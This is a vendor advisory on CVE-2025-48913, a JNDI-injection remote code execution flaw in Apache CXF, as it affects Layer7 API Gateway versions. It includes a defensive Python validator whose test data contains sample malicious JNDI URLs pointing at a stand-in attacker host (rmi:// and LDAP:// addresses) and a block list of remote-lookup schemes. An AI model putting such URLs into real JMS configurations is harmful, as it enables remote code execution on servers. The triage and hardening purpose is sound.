API Gateway :: CVE-2025-48913 - Apache CXF
Article ID: 424052


Products

CA API Gateway

Issue/Introduction

The following vulnerability was reported by a vulnerability scan.

The scan was run after the Layer7_API_PlatformUpdate_64bit_v11.1-Debian-2025-11-25.L7P platform update had been applied, so the finding is against a patched 11.1.x Gateway.

 
Plugin Name                                                              Severity   CVE
Apache CXF < 3.6.8 / 4.x < 4.0.9 / 4.1.x < 4.1.3 RCE (CVE-2025-48913)    Critical   CVE-2025-48913

Vulnerability Overview
  • CVE ID: CVE-2025-48913
  • Component: Apache CXF (Java Message Service transport)
  • Severity: Critical (CVSS 9.8)
  • Description: A remote code execution (RCE) vulnerability exists in Apache CXF's JMS configuration. If untrusted users can configure JMS settings, they could specify malicious RMI or LDAP URLs to execute arbitrary code.
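Both halves of the finding above can be turned into checks: the version ranges in the scanner plugin name, and the injection vector in the description (an RMI or LDAP URL supplied as the JNDI provider URL of a JMS endpoint). The script below is an added example written for this page; it is not code from Broadcom, the Gateway or Apache CXF. The `jndiURL` and `jndi-<java.naming property>` parameter names follow the SOAP/JMS URI convention that CXF's JMS transport accepts (treat that as an assumption and confirm against your own endpoint definitions); the allowed-scheme set, the sample addresses and the hostnames are constructed for the example.

```python
"""Added example for CVE-2025-48913 triage (not code from Broadcom, the Gateway
or Apache CXF).  Two checks:

  cxf_affected()      -- encodes the affected ranges the scanner plugin reports
                         (< 3.6.8, 4.0.x < 4.0.9, 4.1.x < 4.1.3) so a jar version
                         found on an appliance is classified the way the scanner does.
  check_jms_address() -- the allow-list check that removes the injection vector:
                         a CXF-style "jms:jndi:<dest>?..." address whose JNDI
                         provider URL uses rmi://, ldap:// or similar is refused.
"""
import re
from urllib.parse import parse_qs, urlparse


def parse_version(version: str) -> tuple:
    """'3.5.11' -> (3, 5, 11); a trailing qualifier such as '-SNAPSHOT' is ignored."""
    m = re.match(r"\s*(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unrecognised CXF version string: {version!r}")
    return tuple(int(x) for x in m.groups())


def cxf_affected(version: str) -> bool:
    """True when the version falls inside a range the scanner plugin flags."""
    v = parse_version(version)
    if v < (3, 6, 8):          # covers 3.5.11, which Gateway 11.1.x ships
        return True
    if v[:2] == (4, 0):
        return v < (4, 0, 9)   # 4.0.9 is the version Gateway 11.2.x ships
    if v[:2] == (4, 1):
        return v < (4, 1, 3)
    return False               # 3.6.8+ on 3.x, and lines newer than 4.1: not in the reported ranges


# Schemes a broker JNDI lookup legitimately uses.  ASSUMPTION: tailor this set
# to your broker.  rmi/ldap/ldaps/iiop are what JNDI injection abuses to fetch a
# remote object or class, so they are refused outright even if the allow-list is
# later widened by mistake.
ALLOWED_JNDI_SCHEMES = frozenset({"tcp", "ssl", "vm", "amqp", "amqps"})
REMOTE_LOOKUP_SCHEMES = frozenset({"rmi", "ldap", "ldaps", "iiop"})

# Query parameters that carry a JNDI provider URL in a CXF JMS address
# (SOAP/JMS URI convention; assumption, verify against your endpoint definitions).
PROVIDER_URL_PARAMS = ("jndiURL", "jndi-java.naming.provider.url")


def jndi_url_allowed(url: str) -> bool:
    scheme = urlparse(url.strip()).scheme.lower()   # scheme match is case-insensitive
    if not scheme or scheme in REMOTE_LOOKUP_SCHEMES:
        return False           # a URL with no scheme is refused too: JNDI's handling of it is not ours to guess
    return scheme in ALLOWED_JNDI_SCHEMES


def check_jms_address(address: str) -> list:
    """Return findings (empty list means accept) for one JMS endpoint address."""
    if not address.startswith("jms:"):
        return [f"not a jms: address: {address!r}"]
    query = address.partition("?")[2]             # '' when the address carries no parameters
    params = parse_qs(query, keep_blank_values=True)
    findings = []
    for key in PROVIDER_URL_PARAMS:
        for value in params.get(key, []):
            if not jndi_url_allowed(value):
                findings.append(f"{key} rejected: {value!r}")
    return findings


if __name__ == "__main__":
    # Constructed sample addresses, not taken from any real configuration.
    samples = [
        "jms:jndi:dynamicQueues/orders?jndiConnectionFactoryName=ConnectionFactory"
        "&jndiURL=tcp://broker.internal:61616",
        "jms:jndi:dynamicQueues/orders?jndiConnectionFactoryName=ConnectionFactory"
        "&jndiURL=rmi://attacker.example:1099/Exploit",
        "jms:jndi:dynamicQueues/orders?jndi-java.naming.provider.url=LDAP://attacker.example:389/x",
    ]
    for s in samples:
        print(check_jms_address(s) or "ok", "<-", s)
    for ver in ("3.5.11", "3.6.8", "4.0.8", "4.0.9", "4.1.3"):
        print(ver, "affected" if cxf_affected(ver) else "not affected")
```

cxf_affected() lets you classify a cxf-*.jar found on an appliance offline, which is useful when documenting a scanner finding as mitigated rather than fixed. check_jms_address() is the generic hardening against JNDI injection (refuse remote-lookup provider URLs at configuration time); it is written here as an audit of exported endpoint definitions and is not a copy of CXF's own patch.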

Environment

Gateway 11.1.x and all supported versions of Gateway Appliance deployments.

Resolution

Impact Assessment for Layer 7 API Gateway
  • Gateway Version 11.2.x: Not Vulnerable. This version ships Apache CXF 4.0.9, which contains the upstream fix for CVE-2025-48913.
  • Gateway Versions 11.1.2, 11.1.3: Mitigated by Analysis. These versions ship the affected Apache CXF 3.5.11 library, but the Gateway is not exploitable because:
    • The Gateway does not use the vulnerable Apache CXF classes (e.g., JaxWsServerFactoryBean) for JMS connection management.
    • JMS connection parameters are not exposed to unauthenticated users through any Gateway API, so an attacker has no way to inject an RMI or LDAP URL into the JMS configuration.
    • Note that a version-based scanner will keep flagging the 3.5.11 jar on 11.1.x until the Gateway is upgraded; the two points above are the basis for recording the finding as mitigated.
Remediation and Recommendations
  • Primary Recommendation: Upgrade to Layer7 API Gateway 11.2 or later. This release provides a permanent fix by moving the library to CXF 4.0.9, and also includes other major platform updates such as JDK 21 and Tomcat 10.1.
  • Policy for 11.1.x: No backport to 11.1.x is planned, because the fix requires moving Apache CXF from the 3.5.x line to 3.6.x, and that migration in turn requires significant updates to dependent libraries.

Additional Information

National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2025-48913

CVE Record Information: https://www.cve.org/CVERecord?id=CVE-2025-48913